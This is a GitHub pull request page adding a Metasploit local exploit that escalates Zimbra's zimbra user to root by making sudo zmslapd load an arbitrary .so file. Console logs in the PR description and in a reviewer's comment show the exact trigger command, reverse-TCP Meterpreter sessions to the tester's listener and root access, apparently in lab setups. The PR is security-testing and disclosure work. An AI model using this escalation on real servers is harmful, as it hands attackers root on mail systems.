Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

New module for 0-day Zimbra privilege escalation ("slapper") #16807

Merged
merged 11 commits into from
Aug 9, 2022
Merged

New module for 0-day Zimbra privilege escalation ("slapper") #16807

merged 11 commits into from
Aug 9, 2022

Conversation

rbowes-r7
Copy link
Contributor

@rbowes-r7 rbowes-r7 commented Jul 21, 2022
edited
Loading

This adds a local exploit for Zimbra, to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file. This was publicly disclosed in October of 2021, but I'm not sure that anybody reported it to Zimbra. (I reported it today, have not heard back yet)

Note that this is branched off of #16796 since it goes with that module (and is what I'm using for testing) - I'm happy to re-base if that's a problem!

Verification

Install Zimbra (sorry) on any supported Linux version and get a session as the zimbra user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root

@h00die
Copy link
Contributor

h00die commented Jul 21, 2022

https://www.youtube.com/watch?v=qPr-xsQvhgw

@github-actions
Copy link

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 self-assigned this Aug 1, 2022
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Aug 2, 2022
edited
Loading

EDIT: Copy/Pasta fail...
This PR shares code and has dependencies from #16796 and should be landed after it.

@bwatters-r7 bwatters-r7 force-pushed the zimbra-slapper-privesc branch from dae8ca2 to 5d7fb28 Compare August 5, 2022 18:56
@cdelafuente-r7
Copy link
Contributor

cdelafuente-r7 commented Aug 9, 2022
edited
Loading

I just tested against Zimbra Collaboration 8.8.15 Patch 31 on Ubuntu 18.04 and it works great! I used CVE-2022-30333 - path traversal vulnerability in UnRAR module to get a session first.

  • Exemple output
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sessions

Active sessions
===============

  Id  Name  Type                   Information                         Connection
  --  ----  ----                   -----------                         ----------
  1         meterpreter x64/linux  zimbra @ mail.donotexistdomain.foo  10.0.0.1:4444 -> 10.0.0.22:38822 (10.0.0.22)

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit verbose=true lhost=10.0.0.1 SESSION=1

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.ng58U2
[*] Creating directory /tmp/.ng58U2
[*] /tmp/.ng58U2 created
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.ng58U2/.SD4X0GB
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.0.0.1
[+] Deleted /tmp/.ng58U2
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.1:58877) at 2022-08-09 18:03:06 +0200


meterpreter >
meterpreter > sysinfo
Computer     : mail.donotexistdomain.foo
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

@bwatters-r7 bwatters-r7 merged commit a8e73d9 into rapid7:master Aug 9, 2022
@bwatters-r7
Copy link
Contributor

Release Notes

This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.

@jmartin-tech jmartin-tech added the rn-modules release notes for new or majorly enhanced modules label Aug 11, 2022
@fevar54
Copy link

fevar54 commented Aug 16, 2022

you have resulting indicators of compromise to your test...
Thank you

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

@cdelafuente-r7 cdelafuente-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
7 participants
@rbowes-r7 @h00die @bwatters-r7 @cdelafuente-r7 @fevar54 @jmartin-tech @gwillcox-r7